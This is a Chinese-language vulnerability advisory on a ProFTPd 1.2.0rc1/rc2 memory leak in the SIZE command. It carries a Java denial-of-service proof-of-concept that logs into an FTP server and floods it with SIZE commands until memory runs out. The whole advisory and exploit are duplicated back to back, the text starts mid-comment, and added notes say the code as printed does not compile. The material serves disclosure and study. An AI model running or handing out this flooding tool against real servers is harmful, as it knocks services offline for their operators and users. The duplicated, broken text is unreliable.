涉及程序:
ProFTPd
描述:
ProFTPd 内存泄露引起拒绝服务攻击
详细:
ProFTPd 是一款非常流行的 FTP 服务器。发现它存在一个安全漏洞,允许恶意用户对它进行拒绝服务攻击。
ProFTPd 在处理 SIZE FTP 命令时存在内存泄露:向服务器发送大约 5000 次 SIZE 命令即可使 ProFTPd 多消耗超过 300KB 的内存;继续发送更多的 SIZE 命令最终会导致拒绝服务。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
*/
import java.net.*;
import java.io.*;
/**
 * Minimal line-oriented client over a TCP socket.
 *
 * <p>The constructor opens the socket (with a small connect-retry budget, see
 * {@code doaSocket}) and keeps only a reader and a writer over it; the socket
 * itself is never stored, so nothing in this class ever closes it. Not thread-safe.
 *
 * <p>Transcription note: every backslash in this listing appears as a forward
 * slash ("/n" where "\n" was meant), so the messages below print a literal
 * slash-n rather than a line break.
 */
class TCPconnection {
/**
 * Connects to {@code hostname}:{@code portnumber} and wraps the socket streams.
 *
 * @param hostname   host to connect to
 * @param portnumber TCP port to connect to
 * @throws Exception if the host cannot be resolved or all connect attempts fail
 *                   (both propagate from {@code doaSocket})
 */
public TCPconnection (String hostname, int portnumber) throws Exception {
Socket s = doaSocket(hostname, portnumber);
// Both streams use the platform default charset (no charset argument given).
br = new BufferedReader (new InputStreamReader (s.getInputStream()));
// PrintStream does not throw IOException; a failed write is only recorded in its error flag.
ps = new PrintStream (s.getOutputStream());
}
/**
 * Reads one line from the peer.
 *
 * @return the next line without its terminator, or {@code null} once the peer closes the stream
 * @throws Exception on any I/O error; the original IOException is not attached as the cause
 */
public String readLine() throws Exception {
String s;
try { s = br.readLine(); }
catch (IOException ioe) {
System.out.println("TCP Error ... it's a little hax0r exception ;-)");
throw new Exception ("/nInput Error: I/O Error");
}
return s;
}
/**
 * Sends {@code s} plus a line terminator to the peer.
 * Write failures are not reported (see the PrintStream note in the constructor).
 *
 * @param s line to send, without terminator
 */
public void println(String s) {
ps.println(s);
}
/**
 * Opens a socket to the given endpoint, retrying on I/O failure.
 *
 * <p>An unknown host aborts at once; any other IOException is logged to stderr and the
 * connect is retried immediately (no back-off), up to {@code maxattempts} times in total.
 *
 * @param hostname   host to connect to
 * @param portnumber TCP port to connect to
 * @return the connected socket
 * @throws Exception   if the hostname cannot be resolved (cause not attached, and the
 *                     "Here is the Exception:" message is not followed by the exception)
 * @throws IOException if every attempt failed; the message text is reused from the retry
 *                     log line, so it still says "trying it again" although no further
 *                     attempt is made
 */
private Socket doaSocket(String hostname, int portnumber) throws Exception {
Socket s = null;
int attempts = 0;
while (s == null && attempts<maxattempts) {
try { s = new Socket(hostname, portnumber); }
catch (UnknownHostException uhe) {
System.err.println("It was no posible to establish the TCP connection./n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
throw new Exception("/nConnection Error: " + "unknown hostname");
}
catch (IOException ioe) {
// Logged and retried without any delay between attempts.
System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
}
attempts++;
}
if (s == null) throw new IOException("/nThe connection was not accomplished due to an I/O Error: trying it again ...");
else return s; }
// Connect-retry budget for doaSocket(). Instance field initializers run before the
// constructor body, so this is already 5 when the constructor calls doaSocket().
private final int maxattempts = 5;
// Reader and writer over the socket opened in the constructor; never closed.
private BufferedReader br;
private PrintStream ps;
}
/**
 * Proof-of-concept driver for the advisory above: logs in to an FTP server and
 * repeats the SIZE command to exercise the per-command memory leak it describes
 * in ProFTPd 1.2.0rc1/rc2.
 *
 * <p>Kept verbatim as the historical PoC. Things a reader should notice: every
 * prompt is read with a plain BufferedReader over stdin, so nothing masks the
 * password, and an EOF on stdin (readLine() returning null) ends in a
 * NullPointerException at the next length() call; the server's replies to
 * USER/PASS are never read before the SIZE loop starts, so a rejected login is
 * not noticed; and the closing "Attack completed" banner sits inside the drain
 * loop, so it is printed once per reply line rather than once. From the server's
 * point of view this traffic is a single session issuing thousands of SIZE
 * commands for the same path.
 *
 * <p>Transcription note: backslashes in this listing became forward slashes
 * ("/n" for "\n", "/\"" for "\""). As printed, the option-2 prompt line
 * therefore does not compile (the "/\"" ends the string literal early).
 */
class proftpDoS {
/**
 * Entry point. Collects host, credentials, a path and an option from stdin, then
 * sends 10000 SIZE commands (option 1) or the open-ended nested loop (option 2),
 * sends QUIT and drains the replies.
 *
 * @param arg ignored; all input is interactive
 * @throws Exception on connection or read failure; a non-numeric option also aborts
 *                   with an uncaught NumberFormatException from Integer.parseInt
 */
public static void main(String[] arg) throws Exception {
InputStreamReader isr;
BufferedReader tcld;
String hostnamez, username, password, file, s1, option;
int i, j, k;
// Interactive input over stdin, platform default charset.
isr = new InputStreamReader(System.in);
tcld = new BufferedReader(isr);
System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
// Each prompt loops until a non-empty line is entered.
hostnamez = "";
while (hostnamez.length()==0) {
System.out.print("Please enter the hostname/IP: ");
hostnamez = tcld.readLine(); }
username = "";
while (username.length()==0) {
System.out.print("Enter the username: ");
username = tcld.readLine(); }
password = "";
while (password.length()==0) {
System.out.print("Enter the password for that username: ");
password = tcld.readLine(); }
file = "";
while (file.length()==0) {
System.out.print("Enter a valid filename on the FTP /n(with correct path of course ;-): ");
file = tcld.readLine(); }
System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
System.out.println("1) Request 10000 size's to the server (it may be enough)");
System.out.println("2) /"No pain no gain/" (pseudo-eternal requests, ey it may be harm ;-P)");
System.out.print("Option: ");
option = tcld.readLine();
// parseInt is unguarded: non-numeric input throws instead of re-prompting.
k = Integer.parseInt(option);
while (!(k==1 || k==2)) {
System.out.print("Option not valid, please try again: ");
option = tcld.readLine();
k = Integer.parseInt(option); }
// Plain control connection on the hard-coded port 21; credentials travel in clear text.
TCPconnection tc = new TCPconnection(hostnamez, 21);
// Login is fire-and-forget: no server reply is read until the drain loop below.
tc.println("user " + username);
tc.println("pass " + password);
if (k==1) {
for(i=0;i<10000;i++)
tc.println("size " + file); }
else if (k==2) {
// The inner bound is computed from j itself: with i == 1 it is j < j (no
// iterations); with i >= 2 it is the "pseudo-eternal" loop the prompt warns about.
for(i=1;i<100;i++)
for(j=2;j<((int)Math.pow(j,i ));j++)
tc.println("size " + file); }
tc.println("quit");
// Drain replies until the server closes the connection. The banner is inside
// the loop, so it is repeated for every reply line rather than printed once.
s1 = tc.readLine();
while (s1!=null) {
s1 = tc.readLine();
System.out.println("Attack completed ... as one of my friends says:");
System.out.println("Hack just r0cks ;-)");
}
}
}
受影响的系统:
ProFTPd 1.2.0rc1
ProFTPd 1.2.0rc2
解决方案:
CNNS 为您提供完善的网络安全服务。
ProFTPd
描述:
ProFTPd 内存泄露引起拒绝服务攻击
详细:
ProFTPd 是一款非常流行的 FTP 服务器。发现它存在一个安全漏洞,允许恶意用户对它进行拒绝服务攻击。
ProFTPd 在处理 SIZE FTP 命令时存在内存泄露:向服务器发送大约 5000 次 SIZE 命令即可使 ProFTPd 多消耗超过 300KB 的内存;继续发送更多的 SIZE 命令最终会导致拒绝服务。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
*/
import java.net.*;
import java.io.*;
/**
 * Minimal line-oriented client over a TCP socket.
 *
 * <p>The constructor opens the socket (with a small connect-retry budget, see
 * {@code doaSocket}) and keeps only a reader and a writer over it; the socket
 * itself is never stored, so nothing in this class ever closes it. Not thread-safe.
 *
 * <p>Transcription note: every backslash in this listing appears as a forward
 * slash ("/n" where "\n" was meant), so the messages below print a literal
 * slash-n rather than a line break.
 */
class TCPconnection {
/**
 * Connects to {@code hostname}:{@code portnumber} and wraps the socket streams.
 *
 * @param hostname   host to connect to
 * @param portnumber TCP port to connect to
 * @throws Exception if the host cannot be resolved or all connect attempts fail
 *                   (both propagate from {@code doaSocket})
 */
public TCPconnection (String hostname, int portnumber) throws Exception {
Socket s = doaSocket(hostname, portnumber);
// Both streams use the platform default charset (no charset argument given).
br = new BufferedReader (new InputStreamReader (s.getInputStream()));
// PrintStream does not throw IOException; a failed write is only recorded in its error flag.
ps = new PrintStream (s.getOutputStream());
}
/**
 * Reads one line from the peer.
 *
 * @return the next line without its terminator, or {@code null} once the peer closes the stream
 * @throws Exception on any I/O error; the original IOException is not attached as the cause
 */
public String readLine() throws Exception {
String s;
try { s = br.readLine(); }
catch (IOException ioe) {
System.out.println("TCP Error ... it's a little hax0r exception ;-)");
throw new Exception ("/nInput Error: I/O Error");
}
return s;
}
/**
 * Sends {@code s} plus a line terminator to the peer.
 * Write failures are not reported (see the PrintStream note in the constructor).
 *
 * @param s line to send, without terminator
 */
public void println(String s) {
ps.println(s);
}
/**
 * Opens a socket to the given endpoint, retrying on I/O failure.
 *
 * <p>An unknown host aborts at once; any other IOException is logged to stderr and the
 * connect is retried immediately (no back-off), up to {@code maxattempts} times in total.
 *
 * @param hostname   host to connect to
 * @param portnumber TCP port to connect to
 * @return the connected socket
 * @throws Exception   if the hostname cannot be resolved (cause not attached, and the
 *                     "Here is the Exception:" message is not followed by the exception)
 * @throws IOException if every attempt failed; the message text is reused from the retry
 *                     log line, so it still says "trying it again" although no further
 *                     attempt is made
 */
private Socket doaSocket(String hostname, int portnumber) throws Exception {
Socket s = null;
int attempts = 0;
while (s == null && attempts<maxattempts) {
try { s = new Socket(hostname, portnumber); }
catch (UnknownHostException uhe) {
System.err.println("It was no posible to establish the TCP connection./n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
throw new Exception("/nConnection Error: " + "unknown hostname");
}
catch (IOException ioe) {
// Logged and retried without any delay between attempts.
System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
}
attempts++;
}
if (s == null) throw new IOException("/nThe connection was not accomplished due to an I/O Error: trying it again ...");
else return s; }
// Connect-retry budget for doaSocket(). Instance field initializers run before the
// constructor body, so this is already 5 when the constructor calls doaSocket().
private final int maxattempts = 5;
// Reader and writer over the socket opened in the constructor; never closed.
private BufferedReader br;
private PrintStream ps;
}
/**
 * Proof-of-concept driver for the advisory above: logs in to an FTP server and
 * repeats the SIZE command to exercise the per-command memory leak it describes
 * in ProFTPd 1.2.0rc1/rc2.
 *
 * <p>Kept verbatim as the historical PoC. Things a reader should notice: every
 * prompt is read with a plain BufferedReader over stdin, so nothing masks the
 * password, and an EOF on stdin (readLine() returning null) ends in a
 * NullPointerException at the next length() call; the server's replies to
 * USER/PASS are never read before the SIZE loop starts, so a rejected login is
 * not noticed; and the closing "Attack completed" banner sits inside the drain
 * loop, so it is printed once per reply line rather than once. From the server's
 * point of view this traffic is a single session issuing thousands of SIZE
 * commands for the same path.
 *
 * <p>Transcription note: backslashes in this listing became forward slashes
 * ("/n" for "\n", "/\"" for "\""). As printed, the option-2 prompt line
 * therefore does not compile (the "/\"" ends the string literal early).
 */
class proftpDoS {
/**
 * Entry point. Collects host, credentials, a path and an option from stdin, then
 * sends 10000 SIZE commands (option 1) or the open-ended nested loop (option 2),
 * sends QUIT and drains the replies.
 *
 * @param arg ignored; all input is interactive
 * @throws Exception on connection or read failure; a non-numeric option also aborts
 *                   with an uncaught NumberFormatException from Integer.parseInt
 */
public static void main(String[] arg) throws Exception {
InputStreamReader isr;
BufferedReader tcld;
String hostnamez, username, password, file, s1, option;
int i, j, k;
// Interactive input over stdin, platform default charset.
isr = new InputStreamReader(System.in);
tcld = new BufferedReader(isr);
System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
// Each prompt loops until a non-empty line is entered.
hostnamez = "";
while (hostnamez.length()==0) {
System.out.print("Please enter the hostname/IP: ");
hostnamez = tcld.readLine(); }
username = "";
while (username.length()==0) {
System.out.print("Enter the username: ");
username = tcld.readLine(); }
password = "";
while (password.length()==0) {
System.out.print("Enter the password for that username: ");
password = tcld.readLine(); }
file = "";
while (file.length()==0) {
System.out.print("Enter a valid filename on the FTP /n(with correct path of course ;-): ");
file = tcld.readLine(); }
System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
System.out.println("1) Request 10000 size's to the server (it may be enough)");
System.out.println("2) /"No pain no gain/" (pseudo-eternal requests, ey it may be harm ;-P)");
System.out.print("Option: ");
option = tcld.readLine();
// parseInt is unguarded: non-numeric input throws instead of re-prompting.
k = Integer.parseInt(option);
while (!(k==1 || k==2)) {
System.out.print("Option not valid, please try again: ");
option = tcld.readLine();
k = Integer.parseInt(option); }
// Plain control connection on the hard-coded port 21; credentials travel in clear text.
TCPconnection tc = new TCPconnection(hostnamez, 21);
// Login is fire-and-forget: no server reply is read until the drain loop below.
tc.println("user " + username);
tc.println("pass " + password);
if (k==1) {
for(i=0;i<10000;i++)
tc.println("size " + file); }
else if (k==2) {
// The inner bound is computed from j itself: with i == 1 it is j < j (no
// iterations); with i >= 2 it is the "pseudo-eternal" loop the prompt warns about.
for(i=1;i<100;i++)
for(j=2;j<((int)Math.pow(j,i ));j++)
tc.println("size " + file); }
tc.println("quit");
// Drain replies until the server closes the connection. The banner is inside
// the loop, so it is repeated for every reply line rather than printed once.
s1 = tc.readLine();
while (s1!=null) {
s1 = tc.readLine();
System.out.println("Attack completed ... as one of my friends says:");
System.out.println("Hack just r0cks ;-)");
}
}
}
受影响的系统:
ProFTPd 1.2.0rc1
ProFTPd 1.2.0rc2
解决方案:
CNNS 为您提供完善的网络安全服务。